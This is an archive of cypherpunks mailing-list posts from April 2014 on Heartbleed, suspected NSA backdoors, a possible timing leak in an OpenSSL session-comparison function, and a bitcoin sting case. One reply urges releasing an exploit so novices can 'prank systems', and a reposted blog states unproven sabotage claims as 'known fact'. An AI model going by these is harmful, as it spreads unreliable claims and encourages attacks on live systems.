-- 
Sent from Ubuntu

From dal at riseup.net Thu Apr 10 11:35:01 2014
From: dal at riseup.net (Douglas Lucas)
Date: Thu, 10 Apr 2014 13:35:01 -0500
Subject: Assange: Debian is Owned by the NSA
In-Reply-To: <2047905.eXV2Ankize@lap>
References: <2047905.eXV2Ankize@lap>
Message-ID: <5346E455.5050100@riseup.net>

Contrary to reports, Assange didn't say Debian is owned by the NSA, but
rather that it is easy to backdoor operating systems:
https://twitter.com/wikileaks/status/454261872704094208

On 04/10/2014 11:48 AM, rysiek wrote:
> Hi there,
>
> so this has come to my attention. Whaddya guys and gals think?
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> http://igurublog.wordpress.com/2014/04/08/julian-assange-debian-is-owned-by-the-nsa/
>
> In his Q&A to his keynote address at the World Hosting Days Global 2014
> conference in April, the world’s largest hosting and cloud event, Julian
> Assange discussed encryption technology in the context of hosting
> systems. He discussed the cypherpunk credo of how encryption can level
> the playing field between powerful governments and people, and about 20
> minutes into his address, he discussed how UNIX-like systems like Debian
> (which he mentioned by name) are engineered by nation-states with
> backdoors which are easily introduced as ‘bugs’, and how the Linux
> system depends on thousands of packages and libraries that may be
> compromised.
>
> I recommend watching his 36 minute Q&A in its entirety, keeping in mind
> my recent warnings about how GNU/Linux is almost entirely engineered by
> the government/military-affiliated Red Hat corporation.
>
> The Voice of Russia website has an article on Assange’s address with a
> few quotes:
>
> “To a degree this is a matter of national sovereignty. The news is
> all flush with talk about how Russia has annexed the Crimea, but the
> reality is, the Five Eyes intelligence alliance, principally the United
> States, have annexed the whole world as a result of annexing the
> computer systems and communications technology that is used to run the
> modern world,” stated Julian Assange in his keynote address…
>
> Don’t just read the short article, listen to the address yourself,
> because Assange goes into many areas, and the work being done in these
> fields.
>
> Assange mentions how Debian famously botched the SSL random number
> generator for years (which was clearly sabotaged – a known fact).
> Speaking of botched security affecting Red Hat, Debian, Ubuntu, Gentoo,
> SuSE, *BSD, and more, the nightmarish OpenSSL recently botched SSL again
> (very serious – updated comments on how a defense contractor in Finland
> outed the NSA here?) It’s very hard to believe this wasn’t deliberate,
> as botching the memory space of private keys is about as completely
> incompetent as you can get, as this area is ultra-critical to the whole
> system. As a result, many private keys, including of providers, were
> potentially compromised, and much private info of service users. Be sure
> to update your systems as this bug is now public knowledge. (For more on
> how OpenSSL is a nightmare, and why this bug is one among many that will
> never be found, listen to FreeBSD developer Poul-Henning Kamp’s
> excellent talk at the FOSDEM BSD conference.)
>
> From the start, my revelations on this blog about Red Hat’s deep control
> of Linux, along with their large corporate/government connections,
> haven’t been just about spying, but about losing the distributed
> engineering quality of Linux, with Red Hat centralizing control. Yet as
> an ex-cypherpunk and crypto software developer, as soon as I started
> using Linux years ago, I noted that all the major distributions used
> watered-down encryption (to use stronger encryption in many areas, such
> as AES-loop, you needed to compile your own kernel and go to great
> lengths to manually bypass barriers they put in place to the use of
> genuinely strong encryption). This told me then that those who
> controlled distributions were deeply in the pockets of intelligence
> networks. So it comes as no surprise to me that they jumped on board
> systemd when told to, despite the mock choice publicized to users –
> there was never any option.
>
> A computer, and especially hosting services (which often run Linux), are
> powerful communication and broadcasting systems in today’s world. If
> you control and have unfettered access to such systems, you basically
> control the world. As Assange notes in the talk, encryption is only as
> strong as its endpoints, e.g. if you’re running a very secure protocol on
> a system with a compromised OS, you’re owned.
>
> As Assange observed:
>
> “The sharing of information, the communication of free peoples,
> across history and across geography, is something that creates,
> maintains, and disciplines laws [governments].”
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From cathalgarvey at cathalgarvey.me Thu Apr 10 05:42:37 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey)
Date: Thu, 10 Apr 2014 13:42:37 +0100
Subject: NSA good guys
In-Reply-To:
References:
Message-ID: <534691BD.1060904@cathalgarvey.me>

Anyone have details on whether Lavabit was vulnerable?
Because that'd beg the question; why ask nicely?

On 10/04/14 12:44, Lodewijk andré de la porte wrote:
> Of course they'd keep it hidden! It'd leak vital information about how they
> know about every bug before others do.
>
> It's also what they've been doing since forever. This was probably a real
> gem among their stones.

-- 
T: @onetruecathal, @IndieBBDNA
P: +353876363185
W: http://indiebiotech.com

From l at odewijk.nl Thu Apr 10 04:44:25 2014
From: l at odewijk.nl (Lodewijk andré de la porte)
Date: Thu, 10 Apr 2014 13:44:25 +0200
Subject: NSA good guys
In-Reply-To:
References:
Message-ID:

Of course they'd keep it hidden! It'd leak vital information about how they
know about every bug before others do.

It's also what they've been doing since forever. This was probably a real
gem among their stones.

From yersinia.spiros at gmail.com Thu Apr 10 06:05:59 2014
From: yersinia.spiros at gmail.com (yersinia)
Date: Thu, 10 Apr 2014 15:05:59 +0200
Subject: Two possible vulnerabilities in OpenSSL?
In-Reply-To: <1397126438.1729.11.camel@shire>
References: <1397126438.1729.11.camel@shire>
Message-ID:

On Thu, Apr 10, 2014 at 12:40 PM, Peter Malone wrote:
> Hey there,
>
> I was auditing OpenSSL last night. I looked at several files and found
> the following:
>
> https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893
> /* Determine if we need to see RI. Strictly speaking if we want to
>  * avoid an attack we should *always* see RI even on initial server
>  * hello because the client doesn't see any renegotiation during an
>  * attack. However this would mean we could not connect to any server
>  * which doesn't support RI so for the immediate future tolerate RI
>  * absence on initial connect only.
>  */
>
> Well that's awful coding.
>
> Unless I'm mistaken, the following memcmp is vulnerable to a remote
> timing attack.
> https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974
> static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b)
> 	{
> 	if (a->ssl_version != b->ssl_version)
> 		return(1);
> 	if (a->session_id_length != b->session_id_length)
> 		return(1);
> 	return(memcmp(a->session_id,b->session_id,a->session_id_length));
> 	}
>
> I posted both of these findings to the full disclosure list last night.
> I figured someone on this list might find it interesting as well.

Yes, I had noticed your post on FD. In my opinion you are right, the value
that is compared can come from the outside. It would be the same problem
that is discussed (also) here. Perhaps the solution might look like the same.

https://trac.torproject.org/projects/tor/ticket/3122

thanks

Best regards

>
> Cheers,
> Peter.
>

From tpb-crypto at laposte.net Thu Apr 10 06:16:26 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Thu, 10 Apr 2014 15:16:26 +0200
Subject: Two possible vulnerabilities in OpenSSL?
In-Reply-To: <1397126438.1729.11.camel@shire>
References: <1397126438.1729.11.camel@shire>
Message-ID: <1198250046.208428.1397135786224.JavaMail.www@wwinf8311>

> Message of 10/04/14 13:11
> From: "Peter Malone"
> To: "cypherpunks at cpunks.org"
> Cc:
> Subject: Two possible vulnerabilities in OpenSSL?
>
> Hey there,
>
> I was auditing OpenSSL last night. I looked at several files and found
> the following:
>
> https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893
> /* Determine if we need to see RI. Strictly speaking if we want to
>  * avoid an attack we should *always* see RI even on initial server
>  * hello because the client doesn't see any renegotiation during an
>  * attack. However this would mean we could not connect to any server
>  * which doesn't support RI so for the immediate future tolerate RI
>  * absence on initial connect only.
>  */
>
> Well that's awful coding.
>
> Unless I'm mistaken, the following memcmp is vulnerable to a remote
> timing attack.
> https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974
> static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b)
> 	{
> 	if (a->ssl_version != b->ssl_version)
> 		return(1);
> 	if (a->session_id_length != b->session_id_length)
> 		return(1);
> 	return(memcmp(a->session_id,b->session_id,a->session_id_length));
> 	}
>
> I posted both of these findings to the full disclosure list last night.
> I figured someone on this list might find it interesting as well.
>
> Cheers,
> Peter.
>
>

Your best bet would be to make an automated exploit for proof-of-concept.
If it allows skiddies to prank systems, people will rush to correct it and
your name will be in the headlines for your 15 minutes of fame.

From juan.g71 at gmail.com Thu Apr 10 12:26:46 2014
From: juan.g71 at gmail.com (Juan Garofalo)
Date: Thu, 10 Apr 2014 16:26:46 -0300
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To:
References: <53443999.2090906@gmx.com> <53447721.9070209@gmx.com> <53457BE8.4020500@gmx.com> <5345917F.3000700@comcast.net>
Message-ID:

--On Thursday, April 10, 2014 3:46 AM -0400 grarpamp wrote:

> On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters
>
>
>> It makes me wonder if the NSA was involved in inserting this bug into
>> OpenSSL clients and servers.
>
> That would be 2+ years of amazing win on NSA part [1]. Any unlikely
> impropriety would come out soon. More likely reality... opensource
> people are busy and good humans and coding mistakes happen.

	Oh. And what about the constant babbling stating that open source is
oh-so-great security-wise because lots of people can look at the code bla
bla bla bla bla. Bla!

> Hopefully the general buzz around NSA/security/crypto/decentral will
> result dedicating more permanent resource to things like protocol devel
> and replacements, and auditing of key underlying software code.
> You really need to be asking if and how the giant for-profit corps
> that use opensource for free are giving back. $50k a year donated to
> fund an independent developer pool from the OSS community to sit on
> the teams of your favorite code projects of choice as auditors is nothing
> to companies like that, a dream gig for the dev, a win for project, and
> good company PR.
>
> How often do you see @ge.com @chase.com @ibm.com, etc
> on developer/donation lists... you need to ask those type of
> @'s if, how, and why not.
>
> [1] And pretty dumb of any attacker to not simply quietly watch,
> analyse and exploit the committed output of any critical project...
> no insertion, cost, or risk necessary to do that.
>

From juan.g71 at gmail.com Thu Apr 10 13:42:57 2014
From: juan.g71 at gmail.com (Juan Garofalo)
Date: Thu, 10 Apr 2014 17:42:57 -0300
Subject: NSA good guys
In-Reply-To: <534691BD.1060904@cathalgarvey.me>
References: <534691BD.1060904@cathalgarvey.me>
Message-ID:

--On Thursday, April 10, 2014 1:42 PM +0100 Cathal Garvey wrote:

> Anyone have details on whether Lavabit was vulnerable? Because that'd
> beg the question; why ask nicely?

	To cover their tracks?

>
> On 10/04/14 12:44, Lodewijk andré de la porte wrote:
>> Of course they'd keep it hidden! It'd leak vital information about how
>> they know about every bug before others do.
>>
>> It's also what they've been doing since forever. This was probably a real
>> gem among their stones.
>>
>
> -- 
> T: @onetruecathal, @IndieBBDNA
> P: +353876363185
> W: http://indiebiotech.com
>

From pc at loom.cc Thu Apr 10 14:59:49 2014
From: pc at loom.cc (Patrick Chkoreff)
Date: Thu, 10 Apr 2014 17:59:49 -0400
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <2853647.cGAsq4hNKP@lap>
References: <2853647.cGAsq4hNKP@lap>
Message-ID: <53471455.9010801@loom.cc>

rysiek wrote, On 04/10/2014 04:08 PM:
> On Thursday, 10 April 2014 16:26:46 Juan Garofalo wrote:
>> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp
>>
>> Oh. And what about the constant babbling stating that open source
>> is oh-so-great security-wise because lots of people can look at
>> the code bla bla bla bla bla. Bla!
>
> Well, they can. Doesn't mean they do. Time to get the message out
> there: "start bloody looking at the code".

And time to start building from source, examining source diffs, and
devising one's own stress tests.

-- Patrick

From rysiek at hackerspace.pl Thu Apr 10 09:46:48 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 10 Apr 2014 18:46:48 +0200
Subject: NSA good guys
In-Reply-To: <534691BD.1060904@cathalgarvey.me>
References: <534691BD.1060904@cathalgarvey.me>
Message-ID: <11645203.rQrtEU9tSh@lap>

On Thursday, 10 April 2014 13:42:37 Cathal Garvey wrote:
> Anyone have details on whether Lavabit was vulnerable? Because that'd
> beg the question; why ask nicely?

Isn't it obvious? To hide the fact of knowing about it. To be able to use
it on other people/organisations. Duh.

-- 
Regards
rysiek
From rysiek at hackerspace.pl Thu Apr 10 09:48:21 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 10 Apr 2014 18:48:21 +0200
Subject: Assange: Debian is Owned by the NSA
Message-ID: <2047905.eXV2Ankize@lap>

Hi there,

so this has come to my attention. Whaddya guys and gals think?

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

http://igurublog.wordpress.com/2014/04/08/julian-assange-debian-is-owned-by-the-nsa/

In his Q&A to his keynote address at the World Hosting Days Global 2014
conference in April, the world’s largest hosting and cloud event, Julian
Assange discussed encryption technology in the context of hosting
systems. He discussed the cypherpunk credo of how encryption can level
the playing field between powerful governments and people, and about 20
minutes into his address, he discussed how UNIX-like systems like Debian
(which he mentioned by name) are engineered by nation-states with
backdoors which are easily introduced as ‘bugs’, and how the Linux
system depends on thousands of packages and libraries that may be
compromised.

I recommend watching his 36 minute Q&A in its entirety, keeping in mind
my recent warnings about how GNU/Linux is almost entirely engineered by
the government/military-affiliated Red Hat corporation.

The Voice of Russia website has an article on Assange’s address with a
few quotes:

“To a degree this is a matter of national sovereignty. The news is
all flush with talk about how Russia has annexed the Crimea, but the
reality is, the Five Eyes intelligence alliance, principally the United
States, have annexed the whole world as a result of annexing the
computer systems and communications technology that is used to run the
modern world,” stated Julian Assange in his keynote address…

Don’t just read the short article, listen to the address yourself,
because Assange goes into many areas, and the work being done in these
fields.

Assange mentions how Debian famously botched the SSL random number
generator for years (which was clearly sabotaged – a known fact).
Speaking of botched security affecting Red Hat, Debian, Ubuntu, Gentoo,
SuSE, *BSD, and more, the nightmarish OpenSSL recently botched SSL again
(very serious – updated comments on how a defense contractor in Finland
outed the NSA here?) It’s very hard to believe this wasn’t deliberate,
as botching the memory space of private keys is about as completely
incompetent as you can get, as this area is ultra-critical to the whole
system. As a result, many private keys, including of providers, were
potentially compromised, and much private info of service users. Be sure
to update your systems as this bug is now public knowledge. (For more on
how OpenSSL is a nightmare, and why this bug is one among many that will
never be found, listen to FreeBSD developer Poul-Henning Kamp’s
excellent talk at the FOSDEM BSD conference.)

From the start, my revelations on this blog about Red Hat’s deep control
of Linux, along with their large corporate/government connections,
haven’t been just about spying, but about losing the distributed
engineering quality of Linux, with Red Hat centralizing control. Yet as
an ex-cypherpunk and crypto software developer, as soon as I started
using Linux years ago, I noted that all the major distributions used
watered-down encryption (to use stronger encryption in many areas, such
as AES-loop, you needed to compile your own kernel and go to great
lengths to manually bypass barriers they put in place to the use of
genuinely strong encryption). This told me then that those who
controlled distributions were deeply in the pockets of intelligence
networks. So it comes as no surprise to me that they jumped on board
systemd when told to, despite the mock choice publicized to users –
there was never any option.

A computer, and especially hosting services (which often run Linux), are
powerful communication and broadcasting systems in today’s world. If
you control and have unfettered access to such systems, you basically
control the world. As Assange notes in the talk, encryption is only as
strong as its endpoints, e.g. if you’re running a very secure protocol on
a system with a compromised OS, you’re owned.

As Assange observed:

“The sharing of information, the communication of free peoples,
across history and across geography, is something that creates,
maintains, and disciplines laws [governments].”

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

-- 
Regards
rysiek

From peter at petermalone.org Thu Apr 10 17:06:12 2014
From: peter at petermalone.org (Peter Malone)
Date: Thu, 10 Apr 2014 20:06:12 -0400
Subject: Two possible vulnerabilities in OpenSSL?
In-Reply-To: <1198250046.208428.1397135786224.JavaMail.www@wwinf8311>
References: <1397126438.1729.11.camel@shire> <1198250046.208428.1397135786224.JavaMail.www@wwinf8311>
Message-ID: <1397174772.1729.44.camel@shire>

It's no longer implemented in OpenSSL, however some of the versions which
were not vulnerable to Heartbleed are impacted. Also the latest version of
Ruby and Android implement it.
https://android.googlesource.com/platform/external/openssl/+/android-4.4.2_r2/ssl/ssl_lib.c

On Thu, 2014-04-10 at 15:16 +0200, tpb-crypto at laposte.net wrote:
>
> > Message of 10/04/14 13:11
> > From: "Peter Malone"
> > To: "cypherpunks at cpunks.org"
> > Cc:
> > Subject: Two possible vulnerabilities in OpenSSL?
> >
> > Hey there,
> >
> > I was auditing OpenSSL last night.
> > I looked at several files and found
> > the following:
> >
> > https://github.com/openssl/openssl/blob/master/ssl/t1_lib.c#L2893
> > /* Determine if we need to see RI. Strictly speaking if we want to
> >  * avoid an attack we should *always* see RI even on initial server
> >  * hello because the client doesn't see any renegotiation during an
> >  * attack. However this would mean we could not connect to any server
> >  * which doesn't support RI so for the immediate future tolerate RI
> >  * absence on initial connect only.
> >  */
> >
> > Well that's awful coding.
> >
> > Unless I'm mistaken, the following memcmp is vulnerable to a remote
> > timing attack.
> > https://github.com/openssl/openssl/blob/master/ssl/ssl_lib.c#L1974
> > static int ssl_session_cmp(const SSL_SESSION *a,const SSL_SESSION *b)
> > 	{
> > 	if (a->ssl_version != b->ssl_version)
> > 		return(1);
> > 	if (a->session_id_length != b->session_id_length)
> > 		return(1);
> > 	return(memcmp(a->session_id,b->session_id,a->session_id_length));
> > 	}
> >
> > I posted both of these findings to the full disclosure list last night.
> > I figured someone on this list might find it interesting as well.
> >
> > Cheers,
> > Peter.
> >
> >
>
> Your best bet would be to make an automated exploit for proof-of-concept.
> If it allows skiddies to prank systems, people will rush to correct it and
> your name will be in the headlines for your 15 minutes of fame.

From rysiek at hackerspace.pl Thu Apr 10 11:29:55 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 10 Apr 2014 20:29:55 +0200
Subject: OpenWTF
Message-ID: <6440800.JWA5UCEB7T@lap>

OHAI,

So I suppose many of you have already seen this. Nonetheless...

W: http://article.gmane.org/gmane.os.openbsd.misc/211963
T: http://www.tedunangst.com/flak/post/heartbleed-vs-mallocconf
F: http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse

To get you interested:
> No. OpenSSL has exploit mitigation countermeasures to make sure it's
> exploitable.

-- 
Regards
rysiek

From jamesdbell9 at yahoo.com Thu Apr 10 21:05:12 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Thu, 10 Apr 2014 21:05:12 -0700 (PDT)
Subject: healthcare.gov vulnerability?
In-Reply-To: <20140411033654.1F352228100@palinka.tinho.net>
References: <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com> <20140411033654.1F352228100@palinka.tinho.net>
Message-ID: <1397189112.80632.YahooMailNeo@web126202.mail.ne1.yahoo.com>

> From: "dan at geer.org"
> To: jim bell
>
> Jim,
>
> And I wonder how all the tax preparation sites plus irs.gov are
> waltzing with Heartbleed just now. April 15 is Tuesday...
>
> --dan

Yes, it's amazing how much security on the Internet is constructed on
foundations of sand, 23 years (for example) after the writing of PGP.
Organizations such as the NSA and CIA should be required to show that they
are pulling their own weight, by discovering and fixing these kinds of
bugs. After all, ostensibly they exist for the benefit of the citizenry of
America, right? I would question the raison d'etre of the NSA if it found
itself more interested in maintaining the existence of security bugs, than
of closing them. The NSA can't claim that nobody else could find them or
exploit them.

As for my idea about healthcare.gov vulnerability: I thought of this many
months ago, but I decided not to post it until the deadline had virtually
expired. (Although, it wasn't like I thought I was the only one who could
imagine such a thing!) I was amazed by the lack of discussion in the
lamestream media about the potential vulnerabilities of people's personal
data.
But, even more obvious to me was the fact that healthcare.gov virtually
invited people to enter false data: It refused to provide people
information about health care plans until they had entered their own
personal information. A person would be motivated to enter a mostly-fake
set of data, solely for the purpose of getting access to the plans. And,
there was a potential 'innocent reason': Systems like this might get
'stuck', making it difficult to correct data, and people might be tempted
to initiate a new account, solely for the purpose of abandoning old data.
I realized that depending on how well healthcare.gov had been written, a
cracker with a script could upload thousands or even over a million
accounts, presumably for the purpose of making the account-numbers look
good.

            Jim Bell

From rysiek at hackerspace.pl Thu Apr 10 13:08:16 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Thu, 10 Apr 2014 22:08:16 +0200
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To:
References:
Message-ID: <2853647.cGAsq4hNKP@lap>

On Thursday, 10 April 2014 16:26:46 Juan Garofalo wrote:
> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp
>
> wrote:
> > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters
> >
> >
> > >> It makes me wonder if the NSA was involved in inserting this bug into
> > >> OpenSSL clients and servers.
> >
> > That would be 2+ years of amazing win on NSA part [1]. Any unlikely
> > impropriety would come out soon. More likely reality... opensource
> > people are busy and good humans and coding mistakes happen.
>
> Oh. And what about the constant babbling stating that open source is
> oh-so-great security-wise because lots of people can look at the code bla
> bla bla bla bla. Bla!

Well, they can. Doesn't mean they do. Time to get the message out there:
"start bloody looking at the code".

-- 
Regards
rysiek

From dan at geer.org Thu Apr 10 19:40:45 2014
From: dan at geer.org (dan at geer.org)
Date: Thu, 10 Apr 2014 22:40:45 -0400
Subject: a speech
Message-ID: <20140411024045.274C02280F0@palinka.tinho.net>

Perhaps of relevance here.

APT in a World of Rising Interdependence
invited address, NSA, 26 March 2014
http://geer.tinho.net/geer.nsa.26iii14.txt

--dan

From tpb-crypto at laposte.net Thu Apr 10 13:51:46 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Thu, 10 Apr 2014 22:51:46 +0200
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <2853647.cGAsq4hNKP@lap>
References: <2853647.cGAsq4hNKP@lap>
Message-ID: <640286212.131972.1397163106211.JavaMail.www@wwinf8308>

> Message of 10/04/14 22:42
> From: "rysiek"
> To: cypherpunks at cpunks.org
> Cc:
> Subject: Re: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
>
> On Thursday, 10 April 2014 16:26:46 Juan Garofalo wrote:
> > --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp
> >
> > wrote:
> > > On Wed, Apr 9, 2014 at 2:29 PM, Christopher J. Walters
> > >
> > >
> > > >> It makes me wonder if the NSA was involved in inserting this bug into
> > > >> OpenSSL clients and servers.
> > >
> > > That would be 2+ years of amazing win on NSA part [1]. Any unlikely
> > > impropriety would come out soon. More likely reality... opensource
> > > people are busy and good humans and coding mistakes happen.
> >
> > Oh. And what about the constant babbling stating that open source is
> > oh-so-great security-wise because lots of people can look at the code bla
> > bla bla bla bla. Bla!
>
> Well, they can. Doesn't mean they do.
> Time to get the message out there:
> "start bloody looking at the code".
>
> -- 
> Regards
> rysiek

There is one reason why this bug came to light, we can see the source code.
Otherwise it could be exploited for decades instead of two years and nobody
would ever notice it.

From dan at geer.org Thu Apr 10 20:15:12 2014
From: dan at geer.org (dan at geer.org)
Date: Thu, 10 Apr 2014 23:15:12 -0400
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: Your message of "Thu, 10 Apr 2014 03:46:44 EDT."
Message-ID: <20140411031512.1B3E12280F8@palinka.tinho.net>

> It makes me wonder if the NSA was involved in inserting this bug into
> OpenSSL clients and servers.

If they did it, someone got a promotion.
If they are as surprised as you are, someone got fired.

In the meantime, tell me that gcc is so compact and well vetted that
there is no room in it for insertions...

--dan, channeling for Ken Thompson

From dan at geer.org Thu Apr 10 20:36:54 2014
From: dan at geer.org (dan at geer.org)
Date: Thu, 10 Apr 2014 23:36:54 -0400
Subject: healthcare.gov vulnerability?
In-Reply-To: Your message of "Wed, 09 Apr 2014 10:29:19 PDT." <1397064559.25249.YahooMailNeo@web126204.mail.ne1.yahoo.com>
Message-ID: <20140411033654.1F352228100@palinka.tinho.net>

Jim,

And I wonder how all the tax preparation sites plus irs.gov are
waltzing with Heartbleed just now. April 15 is Tuesday...

--dan

From dan at geer.org Thu Apr 10 21:06:50 2014
From: dan at geer.org (dan at geer.org)
Date: Fri, 11 Apr 2014 00:06:50 -0400
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: Your message of "Thu, 10 Apr 2014 17:59:49 EDT." <53471455.9010801@loom.cc>
Message-ID: <20140411040650.884292280F8@palinka.tinho.net>

 |
 | And time to start building from source, examining source diffs, and
 | devising one's own stress tests.
 |

http://ieeexplore.ieee.org/xpl/login.jsp?tp=&arnumber=1565233

Countering trusting trust through diverse double-compiling

An air force evaluation of Multics, and Ken Thompson's famous Turing award
lecture "Reflections on Trusting Trust," showed that compilers can be
subverted to insert malicious Trojan horses into critical software,
including themselves. If this attack goes undetected, even complete
analysis of a system's source code cannot find the malicious code that is
running, and methods for detecting this particular attack are not widely
known. This paper describes a practical technique, termed diverse
double-compiling (DDC), that detects this attack and some compiler defects
as well. Simply recompile the source code twice: once with a second
(trusted) compiler, and again using the result of the first compilation.
If the result is bit-for-bit identical with the untrusted binary, then the
source code accurately represents the binary. This technique has been
mentioned informally, but its issues and ramifications have not been
identified or discussed in a peer-reviewed work, nor has a public
demonstration been made. This paper describes the technique, justifies it,
describes how to overcome practical challenges, and demonstrates it.

From jamesdbell9 at yahoo.com Fri Apr 11 00:37:04 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Fri, 11 Apr 2014 00:37:04 -0700 (PDT)
Subject: Police inventing fake crimes
Message-ID: <1397201824.58487.YahooMailNeo@web126201.mail.ne1.yahoo.com>

The major flaw that I see with this case (and others like it) is that it
presumes that the defendants actually BELIEVED the statements by the
police, and RELIED ON them. From the article: "Still, undercover officers
with the U.S. Secret Service and Miami Beach police told both clearly that
they wanted to buy bitcoins with cash supposedly generated by the hacking
of Target Corp. customer information.
The undercover officers said during the secretly videotaped meetings that they planned to use the bitcoins to acquire still more stolen credit cards."

I could 'clearly tell' somebody that the Sun orbited the Earth, but that doesn't mean that the statement was factual. Similarly, the fact that the police told these guys what the article claims they did doesn't require that the defendants actually BELIEVED the allegations. My expectation is that these charges will be quietly dropped: the only ones actually committing the crime(s) are the police themselves. The police solicited money laundering, when there were no facts (actual underlying crimes) supporting the money laundering predicate.

Jim Bell

=======================================
http://news.yahoo.com/fla-bitcoin-case-tests-money-laundering-limits-152957544.html

MIAMI BEACH, Fla. (AP) — Two police officers burst through a hotel room door with guns drawn, yelling "Police! Get Down!" just after an alleged money laundering transaction went down. But instead of briefcases stuffed with a drug dealer's cash, this exchange involved an undercover officer with supposedly stolen credit cards and the virtual currency bitcoin.

The February arrests of Pascal Reid and Michell Espinoza marked the first time any state has brought money laundering charges involving bitcoins, according to Miami-Dade State Attorney Katherine Fernandez Rundle. And it's likely to be a closely-watched test of whether criminal law can adapt to new digital forms of payment.

"These cybercriminals are way ahead of the rest of us in terms of trying to figure out ways they can launder dirty money," Rundle said.

Investigators trolled through an online directory of bitcoin traders to find the 29-year-old Reid and 30-year-old Espinoza, setting up separate meetings with each of the men at restaurants and coffee shops. They were arrested at the same Miami Beach hotel on the same day, at different times.
Defense attorneys said the men have no previous criminal records and were simply enthusiasts of the payment format that allows people to convert cash into digital money for online transactions. Still, undercover officers with the U.S. Secret Service and Miami Beach police told both clearly that they wanted to buy bitcoins with cash supposedly generated by the hacking of Target Corp. customer information. The undercover officers said during the secretly videotaped meetings that they planned to use the bitcoins to acquire still more stolen credit cards.

"My client has never dealt in the area of stolen credit cards," said Espinoza's attorney, Rene Palomino Jr. "My client was simply selling a piece of personal property, which is what a bitcoin is. It has not been recognized as currency yet in the United States."

Attorneys for Reid and Espinoza, both of whom have pleaded not guilty, say they will challenge the very legal foundations of the cases, which are being prosecuted separately. The arrest affidavits for both Reid and Espinoza refer to bitcoins as "electronic currency with no central authority." The Internal Revenue Service issued guidance last month concluding that bitcoins can only be taxed as property and are not legal tender.

Federal law enforcement agencies are watching whether bitcoins are used increasingly in criminal activity, such as the now-defunct Silk Road illegal drug marketplace.

"The idea that illicit actors might exploit the vulnerabilities of virtual currency to launder money is not merely theoretical," said Jennifer Shasky Calvery, director of Treasury's Financial Crimes Enforcement Network, in a recent Florida speech to bankers.

Still, bitcoins have been gaining popularity among mainstream businesses. Overstock.com recently became the first major retailer to accept digital money and the NBA's Sacramento Kings in January announced the team would accept bitcoins, another first. They are increasingly used in restaurants, coffee shops and elsewhere.
The Latin House Grill in Coral Gables is one of the first South Florida restaurants to accept bitcoins and has been hosting meetings to educate people.

Bitcoin users exchange cash for digital money using online exchanges, then store it in a computer program that serves as a wallet. The program can transfer payments directly to merchants or individuals around the world, eliminating transaction fees and the need for bank or credit card information.

"This technology can't go away. It's completely disrupted a lot of existing technology that's archaic, that hasn't evolved," said patron Andrew Barnard, who has been using bitcoins for a year.

In the Florida criminal case, Reid and Espinoza each face up to 25 years in prison if convicted of money laundering and engaging in an unlicensed money services business. Reid is free on $100,000 bail but Espinoza has been unable so far to make bail.

The transactions started small — one payment of $500 translated into about half a bitcoin — and eventually built to a proposed swap involving $30,000 in Reid's case.

"Ice cold money. Ice cold cash. Right out of the freezer," the undercover agent, holding a plastic bag of cash tells Reid on the surveillance tape. Just after Reid accepts the bag, the undercover agent says, "We're cooking with gas," an apparent signal to the officers outside to come in.

"You're a cop?" Reid is heard saying on the tape. "You're a cop?"

Reid attorney Ron Lowy said the prosecution was manufactured.

"The government is frightened of bitcoin. Apparently, they see it as an emerging, new type of economic medium of exchange, and they're worried that they're not regulating it close enough," Lowy said. "These facts do not constitute a crime."

___
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 12550 bytes
Desc: not available
URL:

From rysiek at hackerspace.pl Thu Apr 10 16:10:53 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Fri, 11 Apr 2014 01:10:53 +0200
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To: <53471455.9010801@loom.cc>
References: <2853647.cGAsq4hNKP@lap> <53471455.9010801@loom.cc>
Message-ID: <2304065.KDyk0d8uBL@lap>

On Thursday, 10 April 2014 17:59:49 Patrick Chkoreff wrote:
> rysiek wrote, On 04/10/2014 04:08 PM:
> > On Thursday, 10 April 2014 16:26:46 Juan Garofalo wrote:
> >> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp
> >>
> >>
> >> Oh. And what about the constant babbling stating that open source
> >> is oh-so-great security-wise because lots of people can look at
> >> the code bla bla bla bla bla. Bla!
> >
